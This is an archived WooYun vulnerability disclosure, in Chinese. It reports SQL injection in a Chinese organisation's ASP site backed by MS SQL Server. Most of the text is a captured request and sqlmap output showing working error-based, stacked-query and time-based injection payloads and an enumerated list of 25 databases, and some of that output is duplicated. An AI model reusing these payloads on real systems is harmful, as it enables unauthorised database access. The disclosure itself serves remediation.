乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-01-20: 细节已通知厂商并且等待厂商处理中 2016-01-22: 厂商已经确认,细节仅向厂商公开 2016-02-01: 细节向核心白帽子及相关领域专家公开 2016-02-11: 细节向普通白帽子公开 2016-02-21: 细节向实习白帽子公开 2016-03-06: 细节向公众公开
rt
#
1 burp抓包POST /cczn/query.asp HTTP/1.1Content-Length: 290Content-Type: application/x-www-form-urlencodedCookie: TklSys=ResourceList%5FCurrentPage=1&ResourceList%5FParent=20&ResourceList%5FWorkType=; ASPSESSIONIDCQDRBQRR=FECBMBMAIMILEKPLNEAKCGAK; isvoted=voteid2=2; Tsys%5FComment=Email=sample%40email%2Etst&Title=Mr%2EHost: **.**.**.**Connection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36Accept: */*Button=%b7%b5%bb%d8&ChuFaDiLeiXing=ZhanMing&MuDiDiLeiXing=ZhanMing&optChuFaZhan=123&optMuDiZhan=1&Submit=%c8%b7%b6%a8optChuFaZhan参数存在注入
#2 注入验证[21:58:44] [WARNING] if UNION based SQL injection is not detected, please consier forcing the back-end DBMS (e.g. '--dbms=mysql')POST parameter 'optChuFaZhan' is vulnerable. Do you want to keep testing the oters (if any)? [y/N] ysqlmap identified the following injection point(s) with a total of 228 HTTP(s)equests:---Parameter: optChuFaZhan (POST) Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: Button=%b7%b5%bb%d8&ChuFaDiLeiXing=ZhanMing&MuDiDiLeiXing=ZhanMingoptChuFaZhan=as' AND 2086=CONVERT(INT,(SELECT CHAR(113)+CHAR(106)+CHAR(120)+CHA(120)+CHAR(113)+(SELECT (CASE WHEN (2086=2086) THEN CHAR(49) ELSE CHAR(48) END)+CHAR(113)+CHAR(98)+CHAR(112)+CHAR(98)+CHAR(113))) AND 'wNCT'='wNCT&optMuDiZhan1&Submit=%c8%b7%b6%a8 Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries (comment) Payload: Button=%b7%b5%bb%d8&ChuFaDiLeiXing=ZhanMing&MuDiDiLeiXing=ZhanMingoptChuFaZhan=as';WAITFOR DELAY '0:0:5'--&optMuDiZhan=1&Submit=%c8%b7%b6%a8 Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: Button=%b7%b5%bb%d8&ChuFaDiLeiXing=ZhanMing&MuDiDiLeiXing=ZhanMingoptChuFaZhan=as' WAITFOR DELAY '0:0:5' AND 'rZay'='rZay&optMuDiZhan=1&Submit=%c%b7%b6%a8---[21:58:50] [INFO] testing Microsoft SQL Server[21:58:50] [INFO] confirming Microsoft SQL Server[21:58:51] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windows 2008 R2 or 7web application technology: ASP.NET, Microsoft IIS 7.5, ASPback-end DBMS: Microsoft SQL Server 2008[21:58:51] [WARNING] HTTP error codes detected during run:500 (Internal Server Error) - 223 times #3 列表[22:00:52] [INFO] parsing HTTP request from 'ty.txt'[22:00:53] [INFO] resuming back-end DBMS 'microsoft sql server'[22:00:53] [INFO] testing connection to the target URL[22:00:53] [WARNING] the web server responded with an HTTP error code (500) which could interfere with the results of the testssqlmap resumed the following injection point(s) from stored session:---Parameter: optChuFaZhan (POST) Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: Button=%b7%b5%bb%d8&ChuFaDiLeiXing=ZhanMing&MuDiDiLeiXing=ZhanMing&optChuFaZhan=as' AND 2086=CONVERT(INT,(SELECT CHAR(113)+CHAR(106)+CHAR(120)+CHAR(120)+CHAR(113)+(SELECT (CASE WHEN (2086=2086) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(98)+CHAR(112)+CHAR(98)+CHAR(113))) AND 'wNCT'='wNCT&optMuDiZhan=1&Submit=%c8%b7%b6%a8 Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries (comment) Payload: Button=%b7%b5%bb%d8&ChuFaDiLeiXing=ZhanMing&MuDiDiLeiXing=ZhanMing&optChuFaZhan=as';WAITFOR DELAY '0:0:5'--&optMuDiZhan=1&Submit=%c8%b7%b6%a8 Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: Button=%b7%b5%bb%d8&ChuFaDiLeiXing=ZhanMing&MuDiDiLeiXing=ZhanMing&optChuFaZhan=as' WAITFOR DELAY '0:0:5' AND 'rZay'='rZay&optMuDiZhan=1&Submit=%c8%b7%b6%a8---[22:00:53] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windows 2008 R2 or 7web application technology: ASP.NET, Microsoft IIS 7.5, ASPback-end DBMS: Microsoft SQL Server 2008[22:00:53] [INFO] fetching database names[22:00:53] [INFO] the SQL query used returns 25 entries[22:00:53] [INFO] retrieved: bak2010[22:00:53] [INFO] retrieved: bak2011[22:00:53] [INFO] retrieved: bike[22:00:54] [INFO] retrieved: cnh1001_db[22:00:54] [INFO] retrieved: database2[22:00:54] [INFO] retrieved: dicuz[22:00:54] [INFO] retrieved: ERP[22:00:54] [INFO] retrieved: gjmis_system[22:00:54] [INFO] retrieved: gjmis2011[22:00:55] [INFO] retrieved: gjmis2012[22:00:55] [INFO] retrieved: gjmis2013[22:00:55] [INFO] retrieved: gjmisth2007[22:00:55] [INFO] retrieved: GJOA[22:00:55] [INFO] retrieved: GJWY[22:00:55] [INFO] retrieved: ick[22:00:55] [INFO] retrieved: kefu[22:00:56] [INFO] retrieved: master[22:00:56] [INFO] retrieved: model[22:00:56] [INFO] retrieved: msdb[22:00:56] [INFO] retrieved: ReportServer[22:00:56] [INFO] retrieved: ReportServerTempDB[22:00:56] [INFO] retrieved: tempdb[22:00:56] [INFO] retrieved: test[22:00:56] [INFO] retrieved: webtest[22:00:57] [INFO] retrieved: YCZavailable databases [25]:[*] bak2010[*] bak2011[*] bike[*] cnh1001_db[*] database2[*] dicuz[*] ERP[*] gjmis2011[*] gjmis2012[*] gjmis2013[*] gjmis_system[*] gjmisth2007[*] GJOA[*] GJWY[*] ick[*] kefu[*] master[*] model[*] msdb[*] ReportServer[*] ReportServerTempDB[*] tempdb[*] test[*] webtest[*] YCZ #4 多个页面存在post注入 ,就不一一截图了**.**.**.**/more.asp**.**.**.**/more2.asp**.**.**.**/more3.asp**.**.**.**/more4.asp**.**.**.**/more7.asp**.**.**.** /more9.asp**.**.**.** /more_fz.asp**.**.**.** /more_ygfc.asp
#3 列表[22:00:52] [INFO] parsing HTTP request from 'ty.txt'[22:00:53] [INFO] resuming back-end DBMS 'microsoft sql server'[22:00:53] [INFO] testing connection to the target URL[22:00:53] [WARNING] the web server responded with an HTTP error code (500) which could interfere with the results of the testssqlmap resumed the following injection point(s) from stored session:---Parameter: optChuFaZhan (POST) Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: Button=%b7%b5%bb%d8&ChuFaDiLeiXing=ZhanMing&MuDiDiLeiXing=ZhanMing&optChuFaZhan=as' AND 2086=CONVERT(INT,(SELECT CHAR(113)+CHAR(106)+CHAR(120)+CHAR(120)+CHAR(113)+(SELECT (CASE WHEN (2086=2086) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(98)+CHAR(112)+CHAR(98)+CHAR(113))) AND 'wNCT'='wNCT&optMuDiZhan=1&Submit=%c8%b7%b6%a8 Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries (comment) Payload: Button=%b7%b5%bb%d8&ChuFaDiLeiXing=ZhanMing&MuDiDiLeiXing=ZhanMing&optChuFaZhan=as';WAITFOR DELAY '0:0:5'--&optMuDiZhan=1&Submit=%c8%b7%b6%a8 Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: Button=%b7%b5%bb%d8&ChuFaDiLeiXing=ZhanMing&MuDiDiLeiXing=ZhanMing&optChuFaZhan=as' WAITFOR DELAY '0:0:5' AND 'rZay'='rZay&optMuDiZhan=1&Submit=%c8%b7%b6%a8---[22:00:53] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windows 2008 R2 or 7web application technology: ASP.NET, Microsoft IIS 7.5, ASPback-end DBMS: Microsoft SQL Server 2008[22:00:53] [INFO] fetching database names[22:00:53] [INFO] the SQL query used returns 25 entries[22:00:53] [INFO] retrieved: bak2010[22:00:53] [INFO] retrieved: bak2011[22:00:53] [INFO] retrieved: bike[22:00:54] [INFO] retrieved: cnh1001_db[22:00:54] [INFO] retrieved: database2[22:00:54] [INFO] retrieved: dicuz[22:00:54] [INFO] retrieved: ERP[22:00:54] [INFO] retrieved: gjmis_system[22:00:54] [INFO] retrieved: gjmis2011[22:00:55] [INFO] retrieved: gjmis2012[22:00:55] [INFO] retrieved: gjmis2013[22:00:55] [INFO] retrieved: gjmisth2007[22:00:55] [INFO] retrieved: GJOA[22:00:55] [INFO] retrieved: GJWY[22:00:55] [INFO] retrieved: ick[22:00:55] [INFO] retrieved: kefu[22:00:56] [INFO] retrieved: master[22:00:56] [INFO] retrieved: model[22:00:56] [INFO] retrieved: msdb[22:00:56] [INFO] retrieved: ReportServer[22:00:56] [INFO] retrieved: ReportServerTempDB[22:00:56] [INFO] retrieved: tempdb[22:00:56] [INFO] retrieved: test[22:00:56] [INFO] retrieved: webtest[22:00:57] [INFO] retrieved: YCZavailable databases [25]:[*] bak2010[*] bak2011[*] bike[*] cnh1001_db[*] database2[*] dicuz[*] ERP[*] gjmis2011[*] gjmis2012[*] gjmis2013[*] gjmis_system[*] gjmisth2007[*] GJOA[*] GJWY[*] ick[*] kefu[*] master[*] model[*] msdb[*] ReportServer[*] ReportServerTempDB[*] tempdb[*] test[*] webtest[*] YCZ
#4 多个页面存在post注入 ,就不一一截图了**.**.**.**/more.asp**.**.**.**/more2.asp**.**.**.**/more3.asp**.**.**.**/more4.asp**.**.**.**/more7.asp**.**.**.** /more9.asp**.**.**.** /more_fz.asp**.**.**.** /more_ygfc.asp
抓紧补吧
危害等级:中
漏洞Rank:8
确认时间:2016-01-22 10:58
CNVD确认未复现所述情况,已经转由CNCERT下发给山西分中心,由其后续协调网站管理单位处置.
暂无